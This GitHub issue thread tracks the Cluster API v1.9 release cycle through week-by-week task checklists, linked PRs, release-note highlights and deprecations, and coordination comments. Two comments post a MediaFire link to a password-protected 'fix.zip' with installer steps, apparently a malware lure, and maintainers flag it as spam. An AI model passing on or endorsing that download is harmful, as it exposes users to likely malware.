### ISSUE TITLE
Tasks for v1.9 release cycle

### ISSUE THREAD

**Issue by Sunnatillo** [kubernetes-sigs/cluster-api#11092]
Please see the corresponding sections of the [role-handbooks](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks) for documentation of individual tasks.

## Tasks

**Notes**:
* Weeks are only specified to give some orientation.
* The following is based on the v1.9 release cycle. Modify according to the tracked release cycle.

Week 1:
* [x] [Release Lead] [Finalize release schedule and team](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#finalize-release-schedule-and-team) 
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11097
* [x] [Release Lead] [Add/remove release team members](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#addremove-release-team-members)
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11096
* [x] [Release Lead] [Prepare main branch for development of the new release](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#prepare-main-branch-for-development-of-the-new-release)
    * [x] PR: https://github.com/kubernetes-sigs/cluster-api/pull/11059
* [x] [Communications Manager] [Add docs to collect release notes for users and migration notes for provider implementers](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/communications#add-docs-to-collect-release-notes-for-users-and-migration-notes-for-provider-implementers)
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11153
* [x] [Communications Manager] [Update supported versions](https://github.com/kubernetes/community/pull/8049)
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11163

Week 1 to 4:
* [x] [Release Lead] [Track] [Remove previously deprecated code](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#track-remove-previously-deprecated-code)
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11140

Week 4:
* [x] [Release Lead] [Cut the v1.7.6 & v1.8.3 releases](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#repeatedly-cut-a-release)
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11158 
   * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11160

Week 8:
* [x] [Release Lead] [Cut the v1.7.7 & v1.8.4 releases](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#repeatedly-cut-a-release)
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11269
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11268

Week 11 to 12:
* [x] [Release Lead] [Track] [Bump dependencies](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#track-bump-dependencies)
 * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11357

Week 12:
* [x] [Release Lead] [Cut the v1.9.0-beta.0 release](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#repeatedly-cut-a-release)
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11371 

```[tasklist]
### Tasks
- [ ] Add a draft title or issue reference here
```

* [x] [Release Lead] [Cut the v1.7.8 & v1.8.5 releases](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#repeatedly-cut-a-release)
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11373
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11372
* [x] [Release Lead] [Create a new GitHub milestone for the next release](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#create-a-new-github-milestone-for-the-next-release)
* [x] [Communications Manager] [Communicate beta to providers](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/communications#communicate-beta-to-providers)

Week 13:

* KubeCon idle week

Week 14:
* [x] [Release Lead] [Cut the v1.9.0-beta.1 release](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#repeatedly-cut-a-release)
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11441
* [x] [Release Lead] [Set a tentative release date for the next minor release](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#set-a-tentative-release-date-for-the-next-minor-release)
* [x] [Release Lead] [Assemble next release team](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#set-a-tentative-release-date-for-the-next-minor-release)
* [x] [Release Lead] Select release lead for the next release cycle

Week 15:
* [x] [Release Lead] [Cut the v1.9.0-rc.0 release](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#repeatedly-cut-a-release)
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11469 
* [x] [Release Lead] [Update milestone applier and GitHub Actions](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#update-milestone-applier-and-github-actions) 
  * [x] https://github.com/kubernetes/test-infra/pull/33861
* [x] [CI Manager] [Setup jobs and dashboards for the release-1.9 release branch](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/ci-signal#setup-jobs-and-dashboards-for-a-new-release-branch)
  * [x] https://github.com/kubernetes/test-infra/pull/33816
* [x] [Communications Manager] [Ensure the book for the new release is available](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/communications#ensure-the-book-for-the-new-release-is-available)
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11486

Week 16:
* [x] [Release Lead] [Cut the v1.9.0-rc.1 release](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#repeatedly-cut-a-release)
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11519

Week 17:
* [x] [Release Lead] [Cut the v1.9.0 release](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#repeatedly-cut-a-release)
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11554
* [x] [Release Lead] [Cut the v1.7.9 & v1.8.6 releases](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#repeatedly-cut-a-release)
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11555
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11556
* [x] [Release Lead] Organize release retrospective
* [x] [Communications Manager] [Change production branch in Netlify to the new release branch](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/communications#change-production-branch-in-netlify-to-the-new-release-branch)
* [x] [Communications Manager] [Update clusterctl links in the quickstart](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/communications#update-clusterctl-links-in-the-quickstart)
  * [x] https://github.com/kubernetes-sigs/cluster-api/pull/11559

Continuously:
* [Release lead] [Maintain the GitHub release milestone](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#continuously-maintain-the-github-release-milestone)
* [Release lead] [Bump the Go version](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#continuously-bump-the-go-version)
* [Communications Manager] [Communicate key dates to the community](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/communications#continuously-communicate-key-dates-to-the-community)
* [Communications Manager] Improve release process documentation
* [Communications Manager] Maintain and improve user facing documentation about releases, release policy and release calendar
* [CI Manager] [Monitor CI signal](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/ci-signal#continuously-monitor-ci-signal)
* [CI Manager] [Reduce the amount of flaky tests](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/ci-signal#continuously-reduce-the-amount-of-flaky-tests)

If and when necessary:
* [ ] [Release Lead] [Track] [Bump the Cluster API apiVersion](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#optional-track-bump-the-cluster-api-apiversion)
* [ ] [Release Lead] [Track] [Bump the Kubernetes version](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#optional-track-bump-the-kubernetes-version)
* [x] [Release Lead] [Track Release and Improvement tasks](https://github.com/kubernetes-sigs/cluster-api/tree/main/docs/release/role-handbooks/release-lead#optional-track-release-and-improvement-tasks)

/priority critical-urgent
/kind feature

Reminder!
Add to release notes:

## Highlights

- Bumped to controller-runtime v0.19, k8s.io/* v0.31, controller-gen v0.16
- Improvements to status fields: (#11105)
  - Proposal: [Improving status in CAPI resources](https://github.com/kubernetes-sigs/cluster-api/blob/main/docs/proposals/20240916-improve-status-in-CAPI-resources.md)
  - Just a few highlights:
    - Overhaul of our contract documentation: [Provider contracts](https://cluster-api.sigs.k8s.io/developer/providers/contracts)
    - Implemented v1beta2 conditions for core Cluster API objects
    - Huge improvements to `Deleting` conditions of Cluster, KCP, MD, MS and Machines
    - Added `Available` conditions to Cluster, KCP and MD
    - Added `ControlPlaneInitialized`, `ControlPlaneAvailable`, `WorkersAvailable`, `RemoteConnectionProbe`, conditions to Cluster
    - Added `UpToDate` conditions to KCP and MD Machines
    - Added `ScalingUp`, `ScalingDown`, `Remediating`, `MachinesReady`, `MachinesUpToDate` conditions to Cluster, KCP, MD and MS
    - Significantly improved `Available`, `EtcdClusterHealthy` and `ControlPlaneComponentsHealthy` conditions on KCP 
    - Added `Paused` conditions
    - Improved counter fields for Cluster, KCP, MD, MS
    - Added utils and extended patch helper for v1beta2 conditions
- ClusterCache supersedes the now deprecated ClusterCacheTracker (#11272)
- ClusterClass: Support oneOf/anyOf/allOf/not in variable schemas (#10637)
- Improved logging in predicates (#10959 #11239 #11188)
- KubeadmControlPlane: Implement pre-terminate hook for clean Machine Deletion (#11137)
- KubeadmControlPlane: NamingStrategy for Machines (#11123)
- MachineSetPreflightChecks feature got promoted to beta (#11228)
- MachineSet/MachineDeployment: Foreground deletion for MachineDeployments and MachineSets (#11174)
- Machine: Improvements to Node drain:
  - Improve Node drain observability (#11074 #11121): documentation: [Machine deletion process](https://main.cluster-api.sigs.k8s.io/tasks/automated-machine-management/machine_deletions)
  - MachineDrainRules Configurable Machine drain behavior (#11240): Proposal: [MachineDrainRules](https://github.com/kubernetes-sigs/cluster-api/blob/main/docs/proposals/20240930-machine-drain-rules.md)
  - Stop waiting for detachment of volumes belonging to Pods ignored during drain (#11246 #11386)
- As usual, significantly improved e2e test framework & coverage (e.g. #11066 #11333 #10984 #11082 #11212 #11127 #11362)
- New providers in clusterctl: Canonical (#11337), Nutanix (#11135), Vultr (#11091)

## Deprecation and Removals Warning

- API: Deprecated FailureMessage and FailureReason fields (#11317)
- The ClusterCacheTracker component has been deprecated (#11312 #11340), please use the new ClusterCache instead.
  - For more context and examples for how to use it, see [PR: Introduce new ClusterCache](https://github.com/kubernetes-sigs/cluster-api/pull/11247) and the corresponding [issue](https://github.com/kubernetes-sigs/cluster-api/issues/11272)
  - Please note:
    - The DisabledFor option (previously ClientUncachedObjects) is not defaulted to &corev1.ConfigMap & &corev1.Secret anymore, thus it’s now necessary to explicitly set DisabledFor to avoid caching ConfigMaps and Secrets.
    - SecretClient and UserAgent are now mandatory options, please take a look at the corresponding godoc.
  - The `--clustercachetracker-concurrency`, `--clustercachetracker-client-qps` and `--clustercachetracker-client-burst` flags on all core CAPI controllers have been renamed to `--clustercache-concurrency`, `--clustercache-client-qps` and `--clustercache-client-burst`
- The deprecated `--metrics-bind-addr` flag has been removed (#11140)
- Deprecated obsolete `errors` package (#10798)
- Deprecated `ClusterCreateInfraReady` and `ClusterUnpausedAndInfrastructureReady` predicates (#11300)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Sunnatillo** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Spam

**Comment by sbueringer** [comment]
/triage accepted

(@Sunnatillo just fyi, I removed the spam)

**Comment by sbueringer** [comment]
@Sunnatillo fyi, I updated the issue description according to https://github.com/kubernetes-sigs/cluster-api/pull/11088 (mostly to fix the links)

**Comment by Sunnatillo** [comment]
I have fixed the week numbers to align with https://github.com/kubernetes-sigs/cluster-api/blob/main/docs/release/releases/release-1.9.md

**Comment by sbueringer** [comment]
@Sunnatillo Would be great if we can link the PRs to the corresponding sub-tasks in this issue. Just makes it a lot easier to track the ongoing work and ensure nothing is missed

**Comment by Sunnatillo** [comment]
> @Sunnatillo Would be great if we can link the PRs to the corresponding sub-tasks in this issue. Just makes it a lot easier to track the ongoing work and ensure nothing is missed

done

**Comment by sbueringer** [comment]
@Sunnatillo Can you please make a note that we should add something about the following to the release notes of v1.9.0? (please in a public place, e.g. in the description of this issue)

* The `--clustercachetracker-concurrency`, `--clustercachetracker-client-qps` and `--clustercachetracker-client-burst` flags on all core CAPI controllers have been renamed to `--clustercache-concurrency`, `--clustercache-client-qps` and `--clustercache-client-burst`

**Comment by sbueringer** [comment]
@Sunnatillo I'm going to use https://github.com/kubernetes-sigs/cluster-api/issues/11092#issuecomment-2402397477 to collect further notes for the release notes. Let's just check this post once we write up the release notes closer to the release

**Comment by chandankumar4** [comment]
Communicated beta release "v1.9.0-beta.0" to providers

List of issues created:
- https://github.com/kubernetes-sigs/cluster-api-addon-provider-helm/issues/311
- https://github.com/kubernetes-sigs/cluster-api-provider-aws/issues/5218
- https://github.com/kubernetes-sigs/cluster-api-provider-azure/issues/5290
- https://github.com/kubernetes-sigs/cluster-api-provider-cloudstack/issues/402
- https://github.com/kubernetes-sigs/cluster-api-provider-digitalocean/issues/657
- https://github.com/kubernetes-sigs/cluster-api-provider-gcp/issues/1374
- https://github.com/kubernetes-sigs/cluster-api-provider-kubemark/issues/120
- https://github.com/kubernetes-sigs/cluster-api-provider-kubevirt/issues/299
- https://github.com/kubernetes-sigs/cluster-api-provider-ibmcloud/issues/2056
- https://github.com/oracle/cluster-api-provider-oci/issues/389
- https://github.com/kubernetes-sigs/cluster-api-provider-openstack/issues/2259
- https://github.com/kubernetes-sigs/cluster-api-operator/issues/637
- https://github.com/kubernetes-sigs/cluster-api-provider-packet/issues/789
- https://github.com/tinkerbell/cluster-api-provider-tinkerbell/issues/417
- https://github.com/kubernetes-sigs/cluster-api-provider-vsphere/issues/3257
- https://github.com/metal3-io/cluster-api-provider-metal3/issues/2103
